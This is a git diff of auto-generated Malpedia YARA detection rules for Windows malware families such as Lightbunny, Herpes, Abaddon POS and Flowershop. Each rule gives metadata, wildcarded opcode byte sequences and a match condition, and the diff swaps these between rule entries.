+		id = "dde384fa-2d37-5576-aebe-de172bd52692"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sombrat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sombrat_auto.yar#L1-L152"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lightbunny"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lightbunny_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "941d1381587fea594c21f438f9e9d8395ac2ab22b349124a0b48a1b28fcdbcbd"
+		logic_hash = "df215a5e4e34e2b6ef794199d12d5fa957ff647111af41e6077ed16529a01062"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -93038,38 +93187,32 @@ rule MALPEDIA_Win_Sombrat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 014114 8b7508 837df800 8b5df4 0f84c3feffff }
-		$sequence_1 = { 833d????????10 b9???????? 0f430d???????? 51 8bc8 }
-		$sequence_2 = { 01041e 8b4508 42 8d7308 }
-		$sequence_3 = { 0145e4 8b55f8 83c40c 294644 }
-		$sequence_4 = { 014620 f6460c04 8945e0 742d 85c0 7429 8b4de4 }
-		$sequence_5 = { 0000 e8???????? c70424???????? 8d5f0c 68???????? }
-		$sequence_6 = { 014620 ff36 114e24 8b442434 }
-		$sequence_7 = { 0144244a 894e0c ffb72c010000 ff15???????? }
-		$sequence_8 = { 016b08 33c0 e9???????? 33ff }
-		$sequence_9 = { 01448c20 48ffc1 493bc9 7cf1 }
-		$sequence_10 = { 016b08 488d05dc980500 41b9e7160000 4889442420 }
-		$sequence_11 = { 015f08 33c0 e9???????? 488b4760 }
-		$sequence_12 = { 0145f1 4533c9 4533c0 488b16 }
-		$sequence_13 = { 015f08 488bcf e8???????? 8bf0 }
-		$sequence_14 = { 015f08 33c0 488b4c2470 4833cc }
-		$sequence_15 = { 015f08 83bfd800000016 0f856c020000 488b87c8000000 }
+		$sequence_0 = { 33c9 b8???????? 90 3910 7412 0524100000 }
+		$sequence_1 = { e8???????? 8b55f4 83c404 b906000000 e8???????? e9???????? }
+		$sequence_2 = { 6a32 ff15???????? 8bcf e8???????? 8bf0 85f6 75e2 }
+		$sequence_3 = { 8d0485586e4100 50 8d8590faffff 03c7 50 e8???????? }
+		$sequence_4 = { ff36 894608 68???????? e8???????? 83c408 }
+		$sequence_5 = { 83b81810000000 0f85defeffff 83b82010000000 0f85d1feffff 6a00 }
+		$sequence_6 = { ff75f4 68???????? e8???????? 8b4df4 83c40c }
+		$sequence_7 = { c1f906 53 6bd830 56 8b048d20ae4100 }
+		$sequence_8 = { 69f224100000 81c6???????? 7410 c7460404000000 ff15???????? }
+		$sequence_9 = { 8b148520ae4100 8a4c1a2d f6c104 7419 8a441a2e 80e1fb }
 
 	condition:
-		7 of them and filesize < 1466368
+		7 of them and filesize < 2376704
 }
-rule MALPEDIA_Win_Zerot_Auto : FILE
+rule MALPEDIA_Win_Herpes_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3b855400-35e2-5ab9-8ab4-5b0c449639bd"
+		id = "e63d0f33-775b-5606-bd1d-23c306bf37e3"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zerot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.zerot_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.herpes"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.herpes_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "c6f6a84594f6a63be175c01b94d4ac1a205809bd4a3810282ffee82abc5e767b"
+		logic_hash = "754c79a3fce60a65d5238f8bbab4a5de6f5328cd0831b8e3c8484725e4b748a5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -93083,32 +93226,32 @@ rule MALPEDIA_Win_Zerot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 83c404 33f6 eb13 6800006000 e8???????? }
-		$sequence_1 = { 6a00 6a00 ff15???????? a3???????? ff15???????? 3db7000000 7527 }
-		$sequence_2 = { 8b4608 c706???????? 85c0 740a 50 }
-		$sequence_3 = { 83c408 e9???????? 8b8d34fdffff bf???????? 83f904 }
-		$sequence_4 = { ff7610 6a01 ff760c ff15???????? }
-		$sequence_5 = { 6a00 6820020000 6a20 6a02 8d854cfeffff 66c78550feffff0005 50 }
-		$sequence_6 = { 7409 50 e8???????? 83c404 33ff c7850cfaffff00000000 32db }
-		$sequence_7 = { 6800020000 8d8510fdffff 6a00 50 e8???????? }
-		$sequence_8 = { 8d8524fdffff 50 8d4376 50 6a02 ffd6 8d851cfdffff }
-		$sequence_9 = { ff15???????? 8bc3 be19000000 43 }
+		$sequence_0 = { 3945cc 8b45b8 7303 8d45b8 56 51 50 }
+		$sequence_1 = { 68???????? e8???????? 83c404 5e 5d c20400 83ff75 }
+		$sequence_2 = { 8945e4 3d01010000 7d0d 8a4c181c 8888c0c24100 40 }
+		$sequence_3 = { 8d45d4 3bc7 7450 3975e8 720c 8b4dd4 51 }
+		$sequence_4 = { ffd7 68???????? 898664010000 ffd5 68???????? 50 898600020000 }
+		$sequence_5 = { e8???????? 8bc7 5f c20400 83661000 }
+		$sequence_6 = { ffd6 0145f0 8b75dc 8b45f0 56 ff75e0 03c7 }
+		$sequence_7 = { ffd7 68???????? ffb6f8010000 894664 }
+		$sequence_8 = { 8b4dfc 898134050000 6a00 6880000000 6a03 6a00 6a01 }
+		$sequence_9 = { 33db 58 89863c020000 899e38020000 }
 
 	condition:
-		7 of them and filesize < 303104
+		7 of them and filesize < 319488
 }
-rule MALPEDIA_Win_Void_Auto : FILE
+rule MALPEDIA_Win_Smarteyes_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "941d9913-0086-5f92-b6d2-4c2b84e02b90"
+		id = "8abe8c6c-e31a-5eb9-813d-c2cddefb10f7"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.void"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.void_auto.yar#L1-L114"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.smarteyes"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.smarteyes_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "0a42c2ab7a2695a1845afe0b2eb12bba423d7c94d695c9222413c48eaaabdfac"
+		logic_hash = "a98816f76882e4d75e28a23473f5f4b08f8f9c7a339abedcd3611228b4563cbb"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -93122,30 +93265,32 @@ rule MALPEDIA_Win_Void_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83e001 0f840c000000 8365ecfe 8d4db8 e9???????? c3 8d8dd4feffff }
-		$sequence_1 = { 8b4564 83e004 0f840c000000 836564fb 8d4dac e9???????? c3 }
-		$sequence_2 = { 6a02 8d4d48 e8???????? 8d4548 c745fc02000000 bb01000000 8bce }
-		$sequence_3 = { 7504 c645f301 8d4db8 c745fcffffffff e8???????? 807df300 0f8569060000 }
-		$sequence_4 = { 83e914 e9???????? 83e918 e9???????? 83e93c e9???????? 83e904 }
-		$sequence_5 = { 50 8d4dd8 e8???????? 8d45d8 8d732c 50 8bce }
-		$sequence_6 = { 50 8bcf e8???????? 8d8d64ffffff c645fc0c e8???????? 33f6 }
-		$sequence_7 = { 0f8510010000 8b85b8feffff 66c745840100 889d71ffffff c78578ffffff00000000 8b4004 8b8c05f0feffff }
+		$sequence_0 = { 84c9 75f6 8b8da8feffff 8bc1 c1e817 2401 8885dafeffff }
+		$sequence_1 = { 8b7b3c 898580fbffff 33c0 66898594fbffff 8b432c 89859cfbffff 8b4310 }
+		$sequence_2 = { 84c9 75f9 2bc6 8d8418280a0000 50 e8???????? 8bd8 }
+		$sequence_3 = { 3bc8 727c 03c0 8945fc 3bc1 7703 894dfc }
+		$sequence_4 = { ffb5e0feffff e8???????? 59 8bbde4feffff 8b4508 6a4b 83c708 }
+		$sequence_5 = { 814df800000001 3bd7 7507 814df800008000 8b5d08 57 }
+		$sequence_6 = { 33c9 3c01 0f94c1 8d442430 52 51 50 }
+		$sequence_7 = { 50 e8???????? 8b4de4 83c40c 6bc930 8975e0 8db118bb0210 }
+		$sequence_8 = { 56 57 6a09 59 33c0 be1c010000 56 }
+		$sequence_9 = { 53 55 56 57 33c0 be???????? 6a06 }
 
 	condition:
-		7 of them and filesize < 2744320
+		7 of them and filesize < 429056
 }
-rule MALPEDIA_Win_Flashflood_Auto : FILE
+rule MALPEDIA_Win_Abaddon_Pos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d9f5526b-ab62-532b-9666-be6697f92fbf"
+		id = "618065dd-9f8b-57c5-a1c0-0e96b509ca5a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flashflood"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.flashflood_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.abaddon_pos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.abaddon_pos_auto.yar#L1-L167"
 		license_url = "N/A"
-		logic_hash = "446473d1c32fe4cdbf702296b6f8adbdf5ae7aa855f826a53c94075ec6207623"
+		logic_hash = "6a0d0d67cac52b36a9cdcb672d29dd1257357954e73ab46b05405f9db5dca5b4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -93159,32 +93304,37 @@ rule MALPEDIA_Win_Flashflood_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? eb0c ff7508 ff75fc ff15???????? 3975fc 5e }
-		$sequence_1 = { 8b45ec 52 8d55f8 52 8b08 6a10 }
-		$sequence_2 = { 8b5508 8b427c 6bc00c 33c9 668b88ec914000 8b5508 }
-		$sequence_3 = { c21000 b8???????? c3 33c9 394c2408 7e0f }
-		$sequence_4 = { 8b45f4 25ffff0000 33c9 8a88b0984000 894de8 eb17 8b55f4 }
-		$sequence_5 = { 8d853cf9ffff 50 ff15???????? 83c420 }
-		$sequence_6 = { 33c0 eb0a 57 ff15???????? 6a01 58 5f }
-		$sequence_7 = { 6a01 57 e8???????? 6a01 e8???????? }
-		$sequence_8 = { 50 e8???????? ff45fc 83c610 }
-		$sequence_9 = { 8a0406 8ad0 c0ea04 c0e004 02d0 }
+		$sequence_0 = { 750a 83fb3c 7605 e9???????? }
+		$sequence_1 = { 7605 e9???????? 48 034510 48 0500040000 803800 }
+		$sequence_2 = { 43 8b86ac010000 b400 b20a f6f2 80fc00 7406 }
+		$sequence_3 = { 8945fc 83f800 7502 eb86 6800d00700 ff75ec }
+		$sequence_4 = { eb91 81be0c01000080cf0700 7607 bb80cf0700 eb06 8b9e0c010000 }
+		$sequence_5 = { 48 89c7 48 8d86b8010000 48 }
+		$sequence_6 = { 6a00 6a02 ff15???????? 8945e8 8d95c0feffff 52 }
+		$sequence_7 = { 81c3f8030000 8903 48 31db 48 8b96d0050000 }
+		$sequence_8 = { 31c0 48 31d2 8a841eb8010000 }
+		$sequence_9 = { ff15???????? 8b86a0010000 3b86a4010000 0f83e6030000 8b9e94010000 039ea0010000 803b33 }
+		$sequence_10 = { 83f809 7603 83e809 ba00000000 eb05 ba01000000 0186ac010000 }
+		$sequence_11 = { 80fd3e 7406 41 80fd3f 756e 49 }
+		$sequence_12 = { 89e5 48 83ec20 48 c7c100000000 }
+		$sequence_13 = { 2c30 80ea30 666bc00a 48 01d0 48 89da }
+		$sequence_14 = { 52 ffb558feffff ff15???????? 8d9530fdffff 52 }
 
 	condition:
-		7 of them and filesize < 114688
+		7 of them and filesize < 40960
 }
-rule MALPEDIA_Win_Globeimposter_Auto : FILE
+rule MALPEDIA_Win_Nikihttp_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "82e87f91-7017-50a0-9ca4-45151fd590f0"
+		id = "d7cb3a9d-079b-5853-9e14-59480637c45a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.globeimposter"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.globeimposter_auto.yar#L1-L113"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nikihttp"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nikihttp_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "6357ace0b94e1815a02ef2680ddeaabe7f1f4794f51d0c9008b25b79555a5d01"
+		logic_hash = "3a904456555531ef9c0cf6ba40524ce39305f318798212cc3d8f5ea0c8f6e7e2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -93198,32 +93348,32 @@ rule MALPEDIA_Win_Globeimposter_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 837c243020 57 8bfd 7608 6ac4 58 }
-		$sequence_1 = { 57 83fd08 0f8205010000 8bc5 }
-		$sequence_2 = { 85ff 7452 8bef 8bf0 8b06 8d7604 }
-		$sequence_3 = { 8b4508 8b4e08 89442418 85ff 7452 }
-		$sequence_4 = { e8???????? 85f6 7408 8d8600bdffff }
-		$sequence_5 = { 3dfa000000 7205 6a0c 5f eb0d }
-		$sequence_6 = { 6af4 58 e9???????? 7904 }
-		$sequence_7 = { ff15???????? ff349f 8bf0 ff15???????? 3bf0 }
-		$sequence_8 = { 7505 6ac4 58 eb2f }
-		$sequence_9 = { 7508 6af4 58 e9???????? 7904 6af6 }
+		$sequence_0 = { 81fb41cd9ec8 75f0 bbcc8dc70b 662e0f1f840000000000 90 81fbe1bcb5f8 7e28 }
+		$sequence_1 = { bf35a51c0f 41bed886138b 41bf87556a70 0f1f440000 81ffdc69e0ab 0f84b0000000 81ff35a51c0f }
+		$sequence_2 = { 81fe7b887e5d 740a 81fee5f97f04 75f0 eb07 bee5f97f04 ebe7 }
+		$sequence_3 = { b8ca43fd9f e9???????? 488b8d98000000 488b9580000000 488b4580 4883ec20 ffd0 }
+		$sequence_4 = { c785d000000003000000 8b8dd0000000 0fbec9 01c1 bab8c94eab ebab 898dd0000000 }
+		$sequence_5 = { bbdd37ea6d ebb4 884d78 8a4d78 884801 c6400200 488b4d00 }
+		$sequence_6 = { bb26cfb9cb 660f1f840000000000 81fbf6c7d601 7f28 81fbddb48ecd 7f50 81fb1c10669d }
+		$sequence_7 = { 8b442404 8b442404 8b442404 8b442404 8b442404 b837c4eca4 e9???????? }
+		$sequence_8 = { babec982ec 0f45ea ba51cce543 662e0f1f840000000000 0f1f00 81facbe177f9 7e28 }
+		$sequence_9 = { ebe9 89bdd0080000 8b85d0080000 6689431e c785a808000020000000 b813cbdf5e 662e0f1f840000000000 }
 
 	condition:
-		7 of them and filesize < 327680
+		7 of them and filesize < 2543616
 }
-rule MALPEDIA_Win_Doppelpaymer_Auto : FILE
+rule MALPEDIA_Win_Flowershop_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1dc537b4-6f02-5ffb-95a3-e1931065b1d5"
+		id = "40619a48-6b17-5bee-8aad-65bf7cac75aa"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doppelpaymer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.doppelpaymer_auto.yar#L1-L187"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flowershop"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.flowershop_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "afd64f2ddb5bd37f521cb40f0013348f346b9ab89a5e6cb99d5de3a1977e77f0"
+		logic_hash = "ba2d45fad977755fd044c78f8aeed860d85d236ff95a62d89180f428b8bcb5e7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -93237,40 +93387,32 @@ rule MALPEDIA_Win_Doppelpaymer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7523 80790264 751d 80790561 }
-		$sequence_1 = { 751d 80790561 7517 80790361 7511 80790474 }
-		$sequence_2 = { e8???????? 8b08 e8???????? 3db6389096 }
-		$sequence_3 = { 80790361 7511 80790474 750b 80790173 7505 80392e }
-		$sequence_4 = { baffffff7f 43 e8???????? 3bd8 }
-		$sequence_5 = { 83ec28 6800002002 6a00 6a01 }
-		$sequence_6 = { 8d8c2478010000 e8???????? 8d8c246c010000 e8???????? 8d8c24dc010000 e8???????? 8d8c24cc010000 }
-		$sequence_7 = { e8???????? 85c0 740d 6a00 ff742440 ffd0 85c0 }
-		$sequence_8 = { c20800 897de0 897de4 897de8 8d4900 }
-		$sequence_9 = { 895ddc 0f84f0000000 e9???????? b801000000 b925155e0b }
-		$sequence_10 = { c20800 8b31 8955f8 8955fc }
-		$sequence_11 = { 8b4d0c 8b5508 83f800 8945f4 894df0 8955ec 7528 }
-		$sequence_12 = { 894de4 8955e0 897ddc 8975d8 }
-		$sequence_13 = { 8945e8 eb0c a1???????? ffd0 8945e4 ebc9 8b45e8 }
-		$sequence_14 = { 8945e4 ebe3 b8c6ea1451 2b45ec 8b4dd8 81c1ffff0000 }
-		$sequence_15 = { 8b7e38 897dc8 8955cc 893424 c744240400000000 c744240858000000 }
-		$sequence_16 = { 8b55d8 8bb2a0000000 8b7de4 01f7 89fb 83c304 8b55e4 }
-		$sequence_17 = { 8b8578ffffff b909fcb97e 2b4df0 8b55a4 39ca }
+		$sequence_0 = { 3b45f0 74e0 8945f0 6a08 8d45f0 6a00 50 }
+		$sequence_1 = { 5e c3 56 33f6 8935???????? e8???????? a1???????? }
+		$sequence_2 = { ff75e0 e8???????? 83c418 85c0 750e c705????????01000000 33c0 }
+		$sequence_3 = { 59 85c0 59 741f 8b07 0105???????? }
+		$sequence_4 = { 51 56 57 33ff 897df8 897dfc c745f898c3fead }
+		$sequence_5 = { 894d0c 76bb 33c0 5f 5e 5b c9 }
+		$sequence_6 = { eb71 0fb605???????? 6bc07c 50 8d85f9e0ffff 68???????? 50 }
+		$sequence_7 = { 33c9 83c60c 81fe???????? 72d8 85c9 0f8471ffffff }
+		$sequence_8 = { 8b7510 8b7dfc 837e0400 750b 817e0818350000 7502 ff17 }
+		$sequence_9 = { 2b01 c3 8b442404 8b542408 8b4804 03ca }
 
 	condition:
-		7 of them and filesize < 7266304
+		7 of them and filesize < 829440
 }
-rule MALPEDIA_Win_Bibi_Auto : FILE
+rule MALPEDIA_Win_Comlook_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c2df99bb-e2c1-5d6e-93f4-9c5f5dcb8fbb"
+		id = "248fcbac-27be-588f-a9f5-d4bcd5003e90"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bibi"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bibi_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.comlook"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.comlook_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "3d7402c133784a89b3daa278c9e13f3e526d55f5078582b8c7ac35078977c2ac"
+		logic_hash = "342d3eba65a3a3eb715f8cb01d2789f76a6de2adfe9c491e43fe2b64805812f2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -93284,32 +93426,32 @@ rule MALPEDIA_Win_Bibi_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f840b010000 488d05a2af0100 4a8b04e8 42385cf838 0f8df5000000 e8???????? }
-		$sequence_1 = { 754a 483bc2 0f84cc000000 660f1f440000 4c8929 4c896910 4c896918 }
-		$sequence_2 = { 488b45bf 488b1cd0 488b5318 4883fa08 }
-		$sequence_3 = { 89442424 488b4c2420 48898b78020000 488bc3 4c8d5c2460 }
-		$sequence_4 = { 483bd9 7522 483bc1 7468 0f1f4000 0f1008 }
-		$sequence_5 = { 488d15645c0100 e8???????? 85c0 7416 }
-		$sequence_6 = { 7716 488bc6 4983f810 7203 488b06 48894e10 c6040800 }
-		$sequence_7 = { 0f84a1000000 b901000000 e8???????? 483bd8 7509 488d3d70c00100 eb16 }
-		$sequence_8 = { 6690 83fb0a 7d65 ba3d000000 e8???????? }
-		$sequence_9 = { 4c8d04c0 498b84d140310300 42f644c03848 7430 8a8c2480000000 4c8b942490000000 80f90a }
+		$sequence_0 = { ffd2 3bf4 e8???????? b807000000 e9???????? 837db000 741f }
+		$sequence_1 = { ff15???????? 83c404 3bf4 e8???????? 8b4508 c7400800000000 33c9 }
+		$sequence_2 = { e9???????? 8b55f8 83ba5007000000 750a 837dbc00 0f8438020000 c78554ffffff00000000 }
+		$sequence_3 = { e9???????? 68df010000 68???????? 6a0c 6a05 e8???????? 8b87c4000000 }
+		$sequence_4 = { eb0a c785c8feffff44f72010 8b5508 83ba7403000000 7411 8b4508 8b8874030000 }
+		$sequence_5 = { c745f000000000 6a00 e8???????? 83c404 8945e8 8955ec c745e400000000 }
+		$sequence_6 = { eb03 894dbc 8b4de4 8b55d0 8bc2 83f910 7303 }
+		$sequence_7 = { eb0a c785b4eeffff518c1e10 837d1400 740c c785b0eeffff70191e10 eb0a c785b0eeffff518c1e10 }
+		$sequence_8 = { e9???????? 6a02 68???????? 6a01 8b5508 52 e8???????? }
+		$sequence_9 = { eb11 8b5518 8b4510 33c9 3b4218 0f9fc1 894ddc }
 
 	condition:
-		7 of them and filesize < 462848
+		7 of them and filesize < 4553728
 }
-rule MALPEDIA_Win_Sarhust_Auto : FILE
+rule MALPEDIA_Win_Alma_Communicator_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1f82eb40-7df1-5fcd-972c-65036c547e83"
+		id = "dd1f8f96-5178-5e9c-b517-f0f999a8d81a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sarhust"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sarhust_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_communicator"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.alma_communicator_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "6be2d8277b702e649c294d54fc6ec35174e3abad1edfa4501c6a9845d06e8218"
+		logic_hash = "4a8409fa38b9c8a27f076e76311702617520d12f6ac449f7858d852242e0bc37"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -93323,32 +93465,32 @@ rule MALPEDIA_Win_Sarhust_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8d8d4cffffff e8???????? 6a00 ff15???????? }
-		$sequence_1 = { 8d8d4cffffff e8???????? 6a00 ff15???????? }
-		$sequence_2 = { 6801000080 ff15???????? 85c0 7408 ff15???????? }
-		$sequence_3 = { 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? 6a00 ff15???????? }
-		$sequence_4 = { eb08 8b4520 8b4d0c 8908 }
-		$sequence_5 = { 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? 6a00 }
-		$sequence_6 = { 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? 8d8d4cffffff }
-		$sequence_7 = { e8???????? 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? 6a00 ff15???????? }
-		$sequence_8 = { e8???????? 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? 6a00 }
-		$sequence_9 = { 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? }
+		$sequence_0 = { 83e13f 6bc930 53 8b5d10 8b0485f08f4100 56 8b7508 }
+		$sequence_1 = { 88040a 41 84c0 75f6 ba???????? }
+		$sequence_2 = { 68f4010000 e8???????? 8364242800 8bf0 59 }
+		$sequence_3 = { 8b0485f08f4100 56 8b7508 57 }
+		$sequence_4 = { 8a4f01 47 84c9 75f8 8d8de0fdffff 668907 e8???????? }
+		$sequence_5 = { eb06 8b9d18ddffff 57 e8???????? }
+		$sequence_6 = { 52 52 ff15???????? 89849da0e9ffff 43 68e8030000 }
+		$sequence_7 = { 0f4ecb 8bd9 7fe6 8bfe 8d4f01 }
+		$sequence_8 = { 59 33c9 89442414 8bf1 }
+		$sequence_9 = { 59 59 8945f4 8d45f8 50 }
 
 	condition:
-		7 of them and filesize < 114688
+		7 of them and filesize < 245760
 }
-rule MALPEDIA_Win_Fuxsocy_Auto : FILE
+rule MALPEDIA_Win_Tendyron_Dropper_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8e4d8f81-20f8-540c-90a5-36985982ab6a"
+		id = "08b15c69-b6bb-5f67-94b5-3ede90043914"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fuxsocy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.fuxsocy_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tendyron_dropper"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tendyron_dropper_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "dc08d740dcf5db967ba7f125c57f76f52d4f954228326fede3bf43506bd45bbf"
+		logic_hash = "94561d7c039213b2f4a4b8b35e59d5ff0543e6273d6a081dce691bd5357ae7eb"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -93362,32 +93504,32 @@ rule MALPEDIA_Win_Fuxsocy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b0d???????? e8???????? 8b4dfc e8???????? 46 3b35???????? 72c4 }
-		$sequence_1 = { 51 51 51 51 f7d8 51 }
-		$sequence_2 = { 50 6a01 53 ff15???????? 85c0 756e 395c2414 }
-		$sequence_3 = { 8b08 ff5108 8b45e4 5f 5e c9 c3 }
-		$sequence_4 = { ff74241c 8bda 894c2414 ff15???????? 8b7c2418 8be8 8b17 }
-		$sequence_5 = { 50 8d44241c 50 6a00 6a07 6a00 ff742424 }
-		$sequence_6 = { 8954240c 85ff 7474 8b4f04 55 8d54240c e8???????? }
-		$sequence_7 = { 8b45fc 6a5c 5a 66891448 }
-		$sequence_8 = { 83c102 e8???????? 8b16 8b4e1c 8944d104 ff06 }
-		$sequence_9 = { 8954241c 8be9 8364241000 8364241800 8364242400 8d442424 50 }
+		$sequence_0 = { 6639430e 750f 6817070000 ff15???????? 33c0 }
+		$sequence_1 = { 81ec84000000 53 56 57 6a44 8bd8 }
+		$sequence_2 = { bf00200000 57 8945f0 e8???????? 59 6a00 57 }
+		$sequence_3 = { 85c0 7d0b 3b7d68 7501 }
+		$sequence_4 = { 56 33db 8d85b0feffff 53 50 e8???????? }
+		$sequence_5 = { 59 3bf3 0f84f3feffff 8b45fc 53 68d3000000 }
+		$sequence_6 = { 84c9 75f9 2bf2 8bce 8b75fc 33d2 f3a6 }
+		$sequence_7 = { 72ee 83f81e 77e9 833d????????00 }
+		$sequence_8 = { 68???????? c70614010000 ff15???????? 50 ff15???????? }
+		$sequence_9 = { 8a01 3429 0429 8801 41 4e }
 
 	condition:
-		7 of them and filesize < 131072
+		7 of them and filesize < 58368
 }
-rule MALPEDIA_Win_Babylon_Rat_Auto : FILE
+rule MALPEDIA_Win_Downdelph_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "bc5c3c5f-b09f-560b-a5c8-4129e77b8b02"
+		id = "4f6b1d19-3f1f-5f81-9e45-1d0b60961ede"
 		date = "2026-01-05"
 		modified = "2026-01-06"
